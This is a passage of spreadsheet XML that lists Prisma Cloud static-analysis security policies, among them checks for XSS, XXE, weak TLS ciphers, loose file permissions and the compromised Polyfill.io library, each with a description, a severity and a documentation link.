          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K307" t="inlineStr">
        <is>
          <t>Ensure no LDAP anonymous binds are used</t>
        </is>
      </c>
      <c r="L307" t="inlineStr"/>
      <c r="M307" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N307" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O307" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P307" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q307" t="inlineStr"/>
      <c r="R307" t="inlineStr"/>
      <c r="S307" t="inlineStr"/>
      <c r="T307" t="b">
        <v>0</v>
      </c>
      <c r="U307" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V307" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W307" t="inlineStr">
        <is>
          <t>The use of anonymous or unauthenticated binds allows access to information in the LDAP directory without providing a password.</t>
        </is>
      </c>
      <c r="X307" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-66</t>
        </is>
      </c>
      <c r="Y307" t="inlineStr"/>
      <c r="Z307" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA307" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB307" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC307" t="inlineStr">
        <is>
          <t>CKV3_SAST_66</t>
        </is>
      </c>
      <c r="AD307" t="b">
        <v>1</v>
      </c>
      <c r="AE307" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF307" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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7" t="inlineStr">
        <is>
          <t>154948af-cc6d-4fdd-b4f1-02950d9aa02e</t>
        </is>
      </c>
      <c r="AI307" t="inlineStr"/>
      <c r="AJ307" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK307" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" t="inlineStr"/>
      <c r="B308" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C308" s="2" t="inlineStr"/>
      <c r="D308" t="inlineStr"/>
      <c r="E308" t="inlineStr"/>
      <c r="F308" t="inlineStr"/>
      <c r="G308" t="b">
        <v>1</v>
      </c>
      <c r="H3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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J308" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K308" t="inlineStr">
        <is>
          <t>Insecure TLS cipher algorithm</t>
        </is>
      </c>
      <c r="L308" t="inlineStr"/>
      <c r="M308" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N308" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O308" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P308" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q308" t="inlineStr"/>
      <c r="R308" t="inlineStr"/>
      <c r="S308" t="inlineStr"/>
      <c r="T308" t="b">
        <v>0</v>
      </c>
      <c r="U308" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V308" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W308" t="inlineStr">
        <is>
          <t>This policy identifies the use of broken or risky cryptographic algorithms in Go (Golang) code. It specifically targets configurations and cipher suites that do not meet the recommended security standards. The policy ensures that only secure cipher suites are used, thereby mitigating potential cryptographic vulnerabilities.</t>
        </is>
      </c>
      <c r="X308" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-246</t>
        </is>
      </c>
      <c r="Y308" t="inlineStr"/>
      <c r="Z308" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA308" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB308" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC308" t="inlineStr">
        <is>
          <t>CKV3_SAST_246</t>
        </is>
      </c>
      <c r="AD308" t="b">
        <v>1</v>
      </c>
      <c r="AE308" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF308" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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8" t="inlineStr">
        <is>
          <t>7e79381a-33fd-4c3c-9914-0331be965c18</t>
        </is>
      </c>
      <c r="AI308" t="inlineStr"/>
      <c r="AJ308" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK308" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" t="inlineStr"/>
      <c r="B309" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C309" s="2" t="inlineStr"/>
      <c r="D309" t="inlineStr"/>
      <c r="E309" t="inlineStr"/>
      <c r="F309" t="inlineStr"/>
      <c r="G309" t="b">
        <v>1</v>
      </c>
      <c r="H3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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J309" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K309" t="inlineStr">
        <is>
          <t>Input validation is missing for critical functions like innerHTML, outerHTML and document.write can lead to XSS vulnerability.</t>
        </is>
      </c>
      <c r="L309" t="inlineStr"/>
      <c r="M309" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N309" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O309" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P309" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q309" t="inlineStr"/>
      <c r="R309" t="inlineStr"/>
      <c r="S309" t="inlineStr"/>
      <c r="T309" t="b">
        <v>0</v>
      </c>
      <c r="U309" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V309" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W309" t="inlineStr">
        <is>
          <t>Detects writing unvalidated input to HTML page that can cause XSS vulnerability. Consider using sanitize-html.sanitizeHtml(), xss-filters.inHTMLData() or dompurify.sanitize() to sanitize users input.</t>
        </is>
      </c>
      <c r="X309" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-193</t>
        </is>
      </c>
      <c r="Y309" t="inlineStr"/>
      <c r="Z309" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA309" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB309" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC309" t="inlineStr">
        <is>
          <t>CKV3_SAST_193</t>
        </is>
      </c>
      <c r="AD309" t="b">
        <v>1</v>
      </c>
      <c r="AE309" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF309" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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9" t="inlineStr">
        <is>
          <t>6a58b9ca-bc58-4077-adbf-19c643b95353</t>
        </is>
      </c>
      <c r="AI309" t="inlineStr"/>
      <c r="AJ309" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK309" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" t="inlineStr"/>
      <c r="B310" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C310" s="2" t="inlineStr"/>
      <c r="D310" t="inlineStr"/>
      <c r="E310" t="inlineStr"/>
      <c r="F310" t="inlineStr"/>
      <c r="G310" t="b">
        <v>1</v>
      </c>
      <c r="H3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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J310" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K310" t="inlineStr">
        <is>
          <t>Sensitive data logging</t>
        </is>
      </c>
      <c r="L310" t="inlineStr"/>
      <c r="M310" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N310" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O310" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P310" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q310" t="inlineStr"/>
      <c r="R310" t="inlineStr"/>
      <c r="S310" t="inlineStr"/>
      <c r="T310" t="b">
        <v>0</v>
      </c>
      <c r="U310" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V310" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W310" t="inlineStr">
        <is>
          <t>Ensure that web applications do not log sensitive data, including credit card numbers and personal details. To ensure compliance with regulations and safeguard user privacy, configure logging mechanisms to mask or remove sensitive data from logs.</t>
        </is>
      </c>
      <c r="X310" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-153</t>
        </is>
      </c>
      <c r="Y310" t="inlineStr"/>
      <c r="Z310" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA310" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB310" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC310" t="inlineStr">
        <is>
          <t>CKV3_SAST_153</t>
        </is>
      </c>
      <c r="AD310" t="b">
        <v>1</v>
      </c>
      <c r="AE310" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF310" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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0" t="inlineStr">
        <is>
          <t>dcb4c387-6425-4c67-8bb0-b533d1c23ce2</t>
        </is>
      </c>
      <c r="AI310" t="inlineStr"/>
      <c r="AJ310" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK310" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" t="inlineStr"/>
      <c r="B311" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C311" s="2" t="inlineStr"/>
      <c r="D311" t="inlineStr"/>
      <c r="E311" t="inlineStr"/>
      <c r="F311" t="inlineStr"/>
      <c r="G311" t="b">
        <v>1</v>
      </c>
      <c r="H3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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J311" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K311" t="inlineStr">
        <is>
          <t>Files and directories are assigned loose permissions</t>
        </is>
      </c>
      <c r="L311" t="inlineStr"/>
      <c r="M311" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N311" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O311" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P311" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q311" t="inlineStr"/>
      <c r="R311" t="inlineStr"/>
      <c r="S311" t="inlineStr"/>
      <c r="T311" t="b">
        <v>0</v>
      </c>
      <c r="U311" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V311" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W311" t="inlineStr">
        <is>
          <t>Files and directories should be assigned the most restrictive permissions</t>
        </is>
      </c>
      <c r="X311" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-69</t>
        </is>
      </c>
      <c r="Y311" t="inlineStr"/>
      <c r="Z311" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA311" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB311" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC311" t="inlineStr">
        <is>
          <t>CKV3_SAST_69</t>
        </is>
      </c>
      <c r="AD311" t="b">
        <v>1</v>
      </c>
      <c r="AE311" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF311" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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1" t="inlineStr">
        <is>
          <t>1b114597-d31b-4240-9151-2eead8c70fec</t>
        </is>
      </c>
      <c r="AI311" t="inlineStr"/>
      <c r="AJ311" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK311" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" t="inlineStr"/>
      <c r="B312" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C312" s="2" t="inlineStr"/>
      <c r="D312" t="inlineStr"/>
      <c r="E312" t="inlineStr"/>
      <c r="F312" t="inlineStr"/>
      <c r="G312" t="b">
        <v>1</v>
      </c>
      <c r="H3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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J312" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K312" t="inlineStr">
        <is>
          <t>Unsafe use of globals() function</t>
        </is>
      </c>
      <c r="L312" t="inlineStr"/>
      <c r="M312" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N312" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O312" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P312" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q312" t="inlineStr"/>
      <c r="R312" t="inlineStr"/>
      <c r="S312" t="inlineStr"/>
      <c r="T312" t="b">
        <v>0</v>
      </c>
      <c r="U312" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V312" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W312" t="inlineStr">
        <is>
          <t>using globals() or locals() functions with user input can lead to code injection and namespace pollution</t>
        </is>
      </c>
      <c r="X312" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-190</t>
        </is>
      </c>
      <c r="Y312" t="inlineStr"/>
      <c r="Z312" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA312" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB312" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC312" t="inlineStr">
        <is>
          <t>CKV3_SAST_190</t>
        </is>
      </c>
      <c r="AD312" t="b">
        <v>1</v>
      </c>
      <c r="AE312" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF312" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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2" t="inlineStr">
        <is>
          <t>6122e9ac-e879-492d-81e9-d9d9f655bbac</t>
        </is>
      </c>
      <c r="AI312" t="inlineStr"/>
      <c r="AJ312" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK312" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" t="inlineStr"/>
      <c r="B313" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C313" s="2" t="inlineStr"/>
      <c r="D313" t="inlineStr"/>
      <c r="E313" t="inlineStr"/>
      <c r="F313" t="inlineStr"/>
      <c r="G313" t="b">
        <v>1</v>
      </c>
      <c r="H3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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J313" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K313" t="inlineStr">
        <is>
          <t>Encryption keys with less than 128 bits</t>
        </is>
      </c>
      <c r="L313" t="inlineStr"/>
      <c r="M313" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N313" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O313" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P313" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q313" t="inlineStr"/>
      <c r="R313" t="inlineStr"/>
      <c r="S313" t="inlineStr"/>
      <c r="T313" t="b">
        <v>0</v>
      </c>
      <c r="U313" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V313" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W313" t="inlineStr">
        <is>
          <t>A small key size makes the ciphertext vulnerable to brute force attacks. At least 128 bits of entropy should be used when generating the key if use of Blowfish is required.</t>
        </is>
      </c>
      <c r="X313" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-18</t>
        </is>
      </c>
      <c r="Y313" t="inlineStr"/>
      <c r="Z313" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA313" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB313" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC313" t="inlineStr">
        <is>
          <t>CKV3_SAST_18</t>
        </is>
      </c>
      <c r="AD313" t="b">
        <v>1</v>
      </c>
      <c r="AE313" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF313" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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3" t="inlineStr">
        <is>
          <t>c7c7099a-9e89-4462-9d9b-8ecde94c2704</t>
        </is>
      </c>
      <c r="AI313" t="inlineStr"/>
      <c r="AJ313" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK313" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" t="inlineStr"/>
      <c r="B314" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C314" s="2" t="inlineStr"/>
      <c r="D314" t="inlineStr"/>
      <c r="E314" t="inlineStr"/>
      <c r="F314" t="inlineStr"/>
      <c r="G314" t="b">
        <v>1</v>
      </c>
      <c r="H3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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J314" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K314" t="inlineStr">
        <is>
          <t>Risky usage of malicious Polyfill.io library</t>
        </is>
      </c>
      <c r="L314" t="inlineStr"/>
      <c r="M314" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N314" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O314" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P314" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q314" t="inlineStr"/>
      <c r="R314" t="inlineStr"/>
      <c r="S314" t="inlineStr"/>
      <c r="T314" t="b">
        <v>0</v>
      </c>
      <c r="U314" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V314" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W314" t="inlineStr">
        <is>
          <t>Polyfill.io has been known to serve malware and the polyfill-library should not be used</t>
        </is>
      </c>
      <c r="X314" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-263</t>
        </is>
      </c>
      <c r="Y314" t="inlineStr"/>
      <c r="Z314" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA314" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB314" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC314" t="inlineStr">
        <is>
          <t>CKV3_SAST_263</t>
        </is>
      </c>
      <c r="AD314" t="b">
        <v>1</v>
      </c>
      <c r="AE314" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF314" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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4" t="inlineStr">
        <is>
          <t>cdddc3a8-11c6-4465-ab62-534a9e8d7a2c</t>
        </is>
      </c>
      <c r="AI314" t="inlineStr"/>
      <c r="AJ314" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK314" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" t="inlineStr"/>
      <c r="B315" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C315" s="2" t="inlineStr"/>
      <c r="D315" t="inlineStr"/>
      <c r="E315" t="inlineStr"/>
      <c r="F315" t="inlineStr"/>
      <c r="G315" t="b">
        <v>1</v>
      </c>
      <c r="H3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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J315" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K315" t="inlineStr">
        <is>
          <t>Inadequate encryption strength for HTTPS</t>
        </is>
      </c>
      <c r="L315" t="inlineStr"/>
      <c r="M315" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N315" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O315" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P315" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q315" t="inlineStr"/>
      <c r="R315" t="inlineStr"/>
      <c r="S315" t="inlineStr"/>
      <c r="T315" t="b">
        <v>0</v>
      </c>
      <c r="U315" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V315" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W315" t="inlineStr">
        <is>
          <t>The application was found enabling insecure TLS protocol versions. When enabling protocol versions for an `SSLContext`, only the following versions should be allowed: - TLSv1.2 - TLSv1.3 - DTLSv1.2 - DTLSv1.3 To mitigate potential security risks, it is strongly advised to enforce TLS 1.2 as the minimum protocol version and disallow older versions such as TLS 1.0.</t>
        </is>
      </c>
      <c r="X315" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-131</t>
        </is>
      </c>
      <c r="Y315" t="inlineStr"/>
      <c r="Z315" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA315" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB315" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC315" t="inlineStr">
        <is>
          <t>CKV3_SAST_131</t>
        </is>
      </c>
      <c r="AD315" t="b">
        <v>1</v>
      </c>
      <c r="AE315" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF315" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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5" t="inlineStr">
        <is>
          <t>dd068fb3-4674-4c51-987d-d4618d7f4013</t>
        </is>
      </c>
      <c r="AI315" t="inlineStr"/>
      <c r="AJ315" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK315" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" t="inlineStr"/>
      <c r="B316" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C316" s="2" t="inlineStr"/>
      <c r="D316" t="inlineStr"/>
      <c r="E316" t="inlineStr"/>
      <c r="F316" t="inlineStr"/>
      <c r="G316" t="b">
        <v>1</v>
      </c>
      <c r="H3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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J316" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K316" t="inlineStr">
        <is>
          <t>Improper Restriction of XML External Entity Reference</t>
        </is>
      </c>
      <c r="L316" t="inlineStr"/>
      <c r="M316" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N316" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O316" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P316" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q316" t="inlineStr"/>
      <c r="R316" t="inlineStr"/>
      <c r="S316" t="inlineStr"/>
      <c r="T316" t="b">
        <v>0</v>
      </c>
      <c r="U316" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V316" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W316" t="inlineStr">
        <is>
          <t>Found use of the native Python XML libraries, which is vulnerable to XML external entity (XXE) attacks. The Python documentation recommends the `defusedxml` library instead. Use 'defusedxml'.</t>
        </is>
      </c>
      <c r="X316" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/sast-policies/python-policies/sast-policy-90</t>
        </is>
      </c>
      <c r="Y316" t="inlineStr"/>
      <c r="Z316" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA316" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB316" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC316" t="inlineStr">
        <is>
          <t>CKV3_SAST_90</t>
        </is>
      </c>
      <c r="AD316" t="b">
        <v>1</v>
      </c>
      <c r="AE316" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF316" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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6" t="inlineStr">
        <is>
          <t>067cc924-cbcf-490d-bff0-27a35c2c0886</t>
        </is>
      </c>
      <c r="AI316" t="inlineStr"/>
      <c r="AJ316" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK316" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" t="inlineStr"/>
      <c r="B317" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C317" s="2" t="inlineStr"/>
      <c r="D317" t="inlineStr"/>
      <c r="E317" t="inlineStr"/>
      <c r="F317" t="inlineStr"/>
      <c r="G317" t="b">
        <v>1</v>
      </c>
      <c r="H3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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J317" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K317" t="inlineStr">
        <is>
          <t>Lack of neutralization of HTML tags</t>
        </is>
      </c>
      <c r="L317" t="inlineStr"/>
      <c r="M317" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N317" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O317" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P317" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q317" t="inlineStr"/>
      <c r="R317" t="inlineStr"/>
      <c r="S317" t="inlineStr"/>
      <c r="T317" t="b">
        <v>0</v>
      </c>
      <c r="U317" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V317" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W317" t="inlineStr">
        <is>
